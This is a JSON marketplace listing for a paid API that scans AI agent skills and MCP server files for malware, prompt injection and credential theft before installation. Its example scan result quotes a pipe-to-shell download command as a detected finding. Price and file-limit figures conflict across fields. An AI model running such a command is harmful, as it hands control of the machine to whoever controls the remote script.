{"uid":"cap_Mo8qqeCvzaao4JYc_1qEn","slug":"crosscheck-skillcheck-6042944d","name":"CrossCheck SkillCheck","description":"Fact-check and review an AI agent's draft before a human sees it: a hallucination check and second opinion on any email, report, summary, or PR description. Returns pass or specific issues with fixes. Wrong arithmetic is recomputed in code; also contradictions, placeholders, leaked secrets, unauthorized commitments, and prompt injection. Send sources to verify citations and claims against them. Signed receipt. $0.02. Full agent guide: https://crosscheckapi.com/llms.txt","url":"https://crosscheckapi.com/v1/skillcheck?utm_source=zero.xyz","method":"POST","headers":{},"bodySchema":{"type":"object","properties":{"ref":{"type":"string","pattern":"^[0-9a-f]{64}$","description":"Optional: the hash of a crosscheck receipt that referred you. Its wallet earns check credits from your first 90 days of spend."},"files":{"type":"array","items":{"type":"object","required":["path","content"],"properties":{"path":{"type":"string","maxLength":200},"content":{"type":"string"}}},"maxItems":200,"minItems":1,"description":"The skill or server's text files, exactly as they would be installed"},"content":{"type":"string","description":"A single SKILL.md, instead of files"}}},"responseSchema":{"type":"json","example":{"job_id":"chk_3a1f0c9e8d7b6a5f4e3d2c1b0a9f8e7d","status":"done","receipt":{"sig":"...","body":{"seq":3,"kind":"skillcheck"},"hash":"..."},"verdict":{"note":"This scan reads the files you sent and does not run them. No findings does not mean safe.","risk":"high","result":"findings","summary":"1 finding, highest high. First: Downloads code and runs it immediately, so whoever controls that URL controls the machine.","findings":[{"file":"scripts/setup.sh","source":"rule","category":"remote_code","location":"line 2: curl -fsSL https://example.com/install.sh | sh","severity":"high","explanation":"Downloads code and runs it immediately, so whoever controls that URL controls the machine."}],"set_aside":[],"model_read":{"files":2,"truncated":[],"rules_only":[]},"bundle_sha256":"...","files_scanned":2,"declared_purpose":"Get the weather for a city."},"share_url":"https://crosscheckapi.com/r/...","result_url":"https://crosscheckapi.com/v1/checks/chk_3a1f0c9e8d7b6a5f4e3d2c1b0a9f8e7d","result_token":"..."}},"example":null,"exampleRequest":null,"tags":["x402"],"displayCostAmount":"0.03","displayCostAsset":"USDC","priceDynamic":false,"priceHint":null,"priceStatus":"priced","priceSource":"probe","requiresHandshake":false,"reviewCount":0,"rating":{"score":"0.00","successRate":"0.00","reviews":0,"stars":null,"state":"unrated"},"availabilityStatus":"unknown","priceObserved":null,"sessionDeposit":null,"pricing":{"kind":"static","summary":"$0.03/call","primary":{"kind":"static","protocol":"x402","network":"base","amountUsd":"0.03","per":"call","confidence":"exact"},"accepted":[{"kind":"static","protocol":"x402","network":"base","amountUsd":"0.03","per":"call","confidence":"exact"}]},"paymentMethods":[{"uid":"pm_XtdMA9Ch5glj-BpiBm3Xa","protocol":"x402","methodType":"crypto","chain":"base","mode":"charge","costAmount":"0.03","costPer":"request","priority":0,"asset":"0x833589fCD6eDb6E08f4c7C32D4f71b54bdA02913","unit":"request","depositMicros":null,"planRef":null}],"brandName":null,"brandSlug":null,"brandBaseUrl":null,"brandDocsUrl":null,"whatItDoes":"Performs a security audit of an AI agent skill or MCP server's source files, detecting malware, prompt injection, credential theft, and supply-chain threats before installation.","exampleAgentPrompt":"Before I install this MCP server, scan its source files for malware, prompt injection, credential theft, and any hidden instructions — here are the file contents.","exampleUseCases":[{"title":"Vetting a third-party MCP server","prompt":"I found this MCP server on GitHub and want to add it to my agent setup — can you scan all its source files first and check for malware, prompt injection, wallet theft, or anything suspicious before I install it?"},{"title":"Marketplace skill due diligence","prompt":"I'm about to install an agent skill from the marketplace — run a security audit on these files and tell me if there's anything that could steal my credentials, exfiltrate secrets, or hijack my agent's behavior."},{"title":"Checking a SKILL.md for hidden instructions","prompt":"Someone sent me this SKILL.md for a new agent capability — can you check it for hidden Unicode characters, instructions aimed at the agent or scanner, or anything that looks like a supply-chain attack?"}],"resultDescription":"A structured security report identifying threats found in the scanned files, including malware patterns (downloads piped to shell), credential and wallet theft attempts, secrets exfiltrated over the network, persistence mechanisms, hidden Unicode, and prompt injection instructions. Includes a signed receipt keyed to the file hashes; previously scanned bundles matching the same hashes can be retrieved without re-scanning.","failureModes":["No files provided — request rejected if both 'files' array and 'content' field are absent","File count exceeds 50-item limit — returns validation error","Individual file content too large or malformed — parsing error returned","Network timeout if files are unusually large","Payment failure via x402 protocol — scan not initiated","False negatives possible for highly obfuscated or novel malware patterns"],"whenToPreferThis":"Use this endpoint when you need a pre-install security gate for AI agent skills or MCP servers — specifically when you want to catch prompt injection, credential theft, hidden Unicode, or supply-chain attacks in plugin source files before they run in your agent environment. Prefer this over generic code scanners because it is tuned for agentic threat models (wallet theft, agent-hijacking instructions, MCP-specific patterns). Cached results via signed receipts make repeat lookups free.","instructions":null,"reviewSummary":null,"reviewSummaryHighlights":null,"reviewSummaryConcerns":null,"reviewSummaryGeneratedAt":null,"activationCount":0,"lastUsedAt":null,"lastSuccessfullyRanAt":null,"lastHealthCheckAt":"2026-10-02T02:34:58.807Z","isFirstParty":false,"canonicalSlug":"crosscheck-skillcheck-6042944d"}